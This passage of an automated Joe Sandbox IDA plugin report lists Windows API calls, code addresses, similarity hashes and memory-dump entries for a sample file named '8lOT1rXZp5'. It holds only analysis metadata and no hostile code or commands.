                                                                                Similarity
                                                                                • API ID: ??2@??3@Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@memcpywsprintf
                                                                                • String ID: %d%%
                                                                                • API String ID: 3036602612-1518462796
                                                                                • Opcode ID: 78bbb3e831907e591ee398b5dbdb869b2610e4328640572f2c36b6117cf16983
                                                                                • Instruction ID: 897cffd7501da61c07280fb0c04fd43b1710295bd97e9baaaef8b47ade3b7e37
                                                                                • Opcode Fuzzy Hash: 78bbb3e831907e591ee398b5dbdb869b2610e4328640572f2c36b6117cf16983
                                                                                • Instruction Fuzzy Hash: 8341A375900704BFDB15ABA1CD45EDAB7B9FF08304F10842EFA42662E1DB39E950CB58
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 00409AB1: ??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409B36
                                                                                  • Part of subcall function 00409AB1: _wtol.MSVCRT ref: 00409B5F
                                                                                  • Part of subcall function 00409AB1: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00409E33,?,0041E7B8), ref: 00409BF0
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0041E7B8), ref: 00409E3D
                                                                                • wsprintfW.USER32 ref: 00409E8C
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?), ref: 00409EAD
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?), ref: 00409EC8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?), ref: 00409ED0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@_wtolwsprintf
                                                                                • String ID: .%03u
                                                                                • API String ID: 2619731350-3746577511
                                                                                • Opcode ID: c57c0ca734d4a9ba290237b44851dc12d51ea165ec7524e85ad6be04a4cecdb0
                                                                                • Instruction ID: 700b262c2caaefa25544a4da0f9a64c534e6180d5fa040a2be027d4297a76f61
                                                                                • Opcode Fuzzy Hash: c57c0ca734d4a9ba290237b44851dc12d51ea165ec7524e85ad6be04a4cecdb0
                                                                                • Instruction Fuzzy Hash: 0C311A71504209AFCF04EF65D8518EE3BB9EF04354B14402BFD15922A2EB39ED85CB98
                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00407AFD
                                                                                • GetSystemMetrics.USER32(0000000B), ref: 00407B19
                                                                                • GetSystemMetrics.USER32(0000003D), ref: 00407B22
                                                                                • GetSystemMetrics.USER32(0000003E), ref: 00407B29
                                                                                • SelectObject.GDI32(?,?), ref: 00407B44
                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407B5F
                                                                                • SelectObject.GDI32(?,?), ref: 00407B85
                                                                                • ReleaseDC.USER32(?,?), ref: 00407B94
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                • String ID:
                                                                                • API String ID: 2466489532-0
                                                                                • Opcode ID: 2de4bb473bfb4b8f909a57e36c0b108e7016f7be85cc3fde936b1bc80fa66e5b
                                                                                • Instruction ID: c6efab504cd997bbd87537fcada5a97682737a4c05f62cea40a671b0dd12ad2f
                                                                                • Opcode Fuzzy Hash: 2de4bb473bfb4b8f909a57e36c0b108e7016f7be85cc3fde936b1bc80fa66e5b
                                                                                • Instruction Fuzzy Hash: 53213871900209EFCB11DFA5DD44A9EBFF4EF08364F10C46AE829A62A0C731AA54DF51
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040B959
                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,00000000,?), ref: 0040B980
                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?), ref: 0040B993
                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,?,?,00000000,?), ref: 0040B9A6
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?), ref: 0040BA5E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$??2@??3@memset
                                                                                • String ID: gj
                                                                                • API String ID: 1510051167-4203073231
                                                                                • Opcode ID: 2871064e199d4175bef4eae133a05c08befcb89f5fc3f6546767ca85b84b6112
                                                                                • Instruction ID: d88508602b6957b794b8bf8d319cc32ba67a487d5ed6ee7fd98696191516abac
                                                                                • Opcode Fuzzy Hash: 2871064e199d4175bef4eae133a05c08befcb89f5fc3f6546767ca85b84b6112
                                                                                • Instruction Fuzzy Hash: 34418CB1A043009FC320EF65C88096BB7E5FB99718F144E2EE4D697752E734E949CB89
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: wsprintf$ExitMessageProcesslstrcat
                                                                                • String ID: 0x%p
                                                                                • API String ID: 1920160435-1745605757
                                                                                • Opcode ID: de6fc8d45903a09760ad9a5220580b1c83e0b5bb66eb900d9d32d6c52b165c1f
                                                                                • Instruction ID: 21ff27a6a0f5ea301036ba6721b670bc4eb5db3d4988dc935fe7745def954242
                                                                                • Opcode Fuzzy Hash: de6fc8d45903a09760ad9a5220580b1c83e0b5bb66eb900d9d32d6c52b165c1f
                                                                                • Instruction Fuzzy Hash: 7F219975901208AFD720DFB4DD85EDA77BCEF04304F0044BAE611A21D1EB78BE548B6A
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00407FBB
                                                                                • GetDC.USER32(00000000), ref: 00407FC6
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407FD2
                                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407FE1
                                                                                • ReleaseDC.USER32(00000000,?), ref: 00407FEF
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00408017
                                                                                • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007744), ref: 00408049
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystem
                                                                                • String ID:
                                                                                • API String ID: 3212456201-0
                                                                                • Opcode ID: d52d7d66d1777c6683a19ab09cc34ad267647d5eb631a79ac1977f9ea0d9fe45
                                                                                • Instruction ID: 0d6cfd111af944fba9a3d93ccc4bb6b201ee0ba3342a1467b8569908ac4f5c69
                                                                                • Opcode Fuzzy Hash: d52d7d66d1777c6683a19ab09cc34ad267647d5eb631a79ac1977f9ea0d9fe45
                                                                                • Instruction Fuzzy Hash: 8921C331901258AFDB319F61DC48FEB7BBCEB89751F0040AAF909B2291DB344E80CB65
                                                                                APIs
                                                                                • EndDialog.USER32(?,00000000), ref: 00408B8C
                                                                                • KillTimer.USER32(?,00000001), ref: 00408B9D
                                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408BC8
                                                                                • SuspendThread.KERNEL32(000002E0), ref: 00408BE1
                                                                                • ResumeThread.KERNEL32(000002E0), ref: 00408BFF
                                                                                • EndDialog.USER32(?,00000000), ref: 00408C21
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                • String ID:
                                                                                • API String ID: 4151135813-0
                                                                                • Opcode ID: b8d07711118b6918d21d1c8eaca0c7ddfc869e85b997711a11a4ac529ea7d2d4
                                                                                • Instruction ID: f920c74330c8bea86978497107333c2b8e7ef69701de9f597e4ce46cb6d114b0
                                                                                • Opcode Fuzzy Hash: b8d07711118b6918d21d1c8eaca0c7ddfc869e85b997711a11a4ac529ea7d2d4
                                                                                • Instruction Fuzzy Hash: 401186752012089FE7155F62EF84AA776BCF704745B04843EF586612B1CB79AC10DF2D
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
                                                                                  • Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
                                                                                  • Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                • ??3@YAXPAX@Z.MSVCRT(00405642,00405642,00000000,%%T\,0041ABF8,0041E89C,00000000,?,00405642,0041BF84,00407A78,00000000,00000000,?), ref: 00403657
                                                                                • ??3@YAXPAX@Z.MSVCRT(00405642,00405642,00000000,%%T/,0041ABE8,0041E89C,00405642,00000000,%%T\,0041ABF8,0041E89C,00000000,?,00405642,0041BF84,00407A78), ref: 00403692
                                                                                • ??3@YAXPAX@Z.MSVCRT(00405642,00405642,0041E89C,00405642,00405642,00000000,%%T/,0041ABE8,0041E89C,00405642,00000000,%%T\,0041ABF8,0041E89C,00000000,?), ref: 004036B5
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00405642,00405642,0041E89C,00405642,00405642,00000000,%%T/,0041ABE8,0041E89C,00405642,00000000,%%T\,0041ABF8,0041E89C,00000000), ref: 004036BD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$??2@
                                                                                • String ID: %%T/$%%T\
                                                                                • API String ID: 3447362686-2679640699
                                                                                • Opcode ID: 1a28dbdc804128d08e23d839a08088058b61c284ccf021372bfe14cbd6a7e681
                                                                                • Instruction ID: 051198a5a84e8eab651e9532c73f3d1e84a216c654f8844b6e35c77aa68833ba
                                                                                • Opcode Fuzzy Hash: 1a28dbdc804128d08e23d839a08088058b61c284ccf021372bfe14cbd6a7e681
                                                                                • Instruction Fuzzy Hash: 17112B319481096ACB05F792EC53DFEB77A9E54318F10016FF712A20A1EF686AC6C699
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
                                                                                  • Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
                                                                                  • Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                • ??3@YAXPAX@Z.MSVCRT(00405613,00405613,00000000,%%S\,0041ABF8,0041E794,00000000,?,00405613,0041BF84,00407A78,00000000,00000000,?), ref: 00403711
                                                                                • ??3@YAXPAX@Z.MSVCRT(00405613,00405613,00000000,%%S/,0041ABE8,0041E794,00405613,00000000,%%S\,0041ABF8,0041E794,00000000,?,00405613,0041BF84,00407A78), ref: 0040374C
                                                                                • ??3@YAXPAX@Z.MSVCRT(00405613,00405613,0041E794,00405613,00405613,00000000,%%S/,0041ABE8,0041E794,00405613,00000000,%%S\,0041ABF8,0041E794,00000000,?), ref: 0040376F
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00405613,00405613,0041E794,00405613,00405613,00000000,%%S/,0041ABE8,0041E794,00405613,00000000,%%S\,0041ABF8,0041E794,00000000), ref: 00403777
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$??2@
                                                                                • String ID: %%S/$%%S\
                                                                                • API String ID: 3447362686-358529586
                                                                                • Opcode ID: 474c15fc286f1518c63e257077c4c3c6a9e87f05ac2da54efc38b817510977b0
                                                                                • Instruction ID: 8a838fedbf1cd3f57b408fd45307b2668bf9ac3bef67c8916e08563063fd3bd5
                                                                                • Opcode Fuzzy Hash: 474c15fc286f1518c63e257077c4c3c6a9e87f05ac2da54efc38b817510977b0
                                                                                • Instruction Fuzzy Hash: 13112B319480096ACB05F792DC53DFEB7799E54314F10016FF712A21A1EF686AC6C699
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
                                                                                  • Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
                                                                                  • Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                • ??3@YAXPAX@Z.MSVCRT(0040561F,0040561F,00000000,%%M\,0041ABF8,0041E7AC,00000000,?,0040561F,0041BF84,00407A78,00000000,00000000,?), ref: 004037CB
                                                                                • ??3@YAXPAX@Z.MSVCRT(0040561F,0040561F,00000000,%%M/,0041ABE8,0041E7AC,0040561F,00000000,%%M\,0041ABF8,0041E7AC,00000000,?,0040561F,0041BF84,00407A78), ref: 00403806
                                                                                • ??3@YAXPAX@Z.MSVCRT(0040561F,0040561F,0041E7AC,0040561F,0040561F,00000000,%%M/,0041ABE8,0041E7AC,0040561F,00000000,%%M\,0041ABF8,0041E7AC,00000000,?), ref: 00403829
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0040561F,0040561F,0041E7AC,0040561F,0040561F,00000000,%%M/,0041ABE8,0041E7AC,0040561F,00000000,%%M\,0041ABF8,0041E7AC,00000000), ref: 00403831
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$??2@
                                                                                • String ID: %%M/$%%M\
                                                                                • API String ID: 3447362686-4143866494
                                                                                • Opcode ID: 0adc32411c15e763c7ec574fd419cf63b4a7b3073318563bdfb54617e37799bb
                                                                                • Instruction ID: 030220e8798e44c826c8ca556ead690550140fee0cdfed357d3ace2c4a35e24d
                                                                                • Opcode Fuzzy Hash: 0adc32411c15e763c7ec574fd419cf63b4a7b3073318563bdfb54617e37799bb
                                                                                • Instruction Fuzzy Hash: E2112B329480096ACB05F792DC53DFEB7799E54314F10016FF612A21A1EF686AC6C699
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 00415561
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 00415575
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 00415580
                                                                                • ??3@YAXPAX@Z.MSVCRT(00417EB7,?,?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 0041558B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417EB7,?,?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 00415596
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00417EB7,?,?,?,?,?,004155CA,?,?,0041565C,?,?,?,00417EB7), ref: 004155A1
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417EB7,?,?,?,?,?,004155CA,?,?,0041565C,?), ref: 004155AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 3145a213dfb67cfef2cd3f2f581fb204e64d657f4ca8865bd35bccdbfbf1d0a0
                                                                                • Instruction ID: 4fa50ddcceeb69e8f72710d2ea5ebf37512df2501741efa383495b0307b540d7
                                                                                • Opcode Fuzzy Hash: 3145a213dfb67cfef2cd3f2f581fb204e64d657f4ca8865bd35bccdbfbf1d0a0
                                                                                • Instruction Fuzzy Hash: E701C0B1800B41ABD231AF27C919887FEF2FF94304344592FE08702A25CB75B891DF88
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000064,0041E89C,00000000,00000000), ref: 0040A241
                                                                                Strings
                                                                                Memory Dump Source
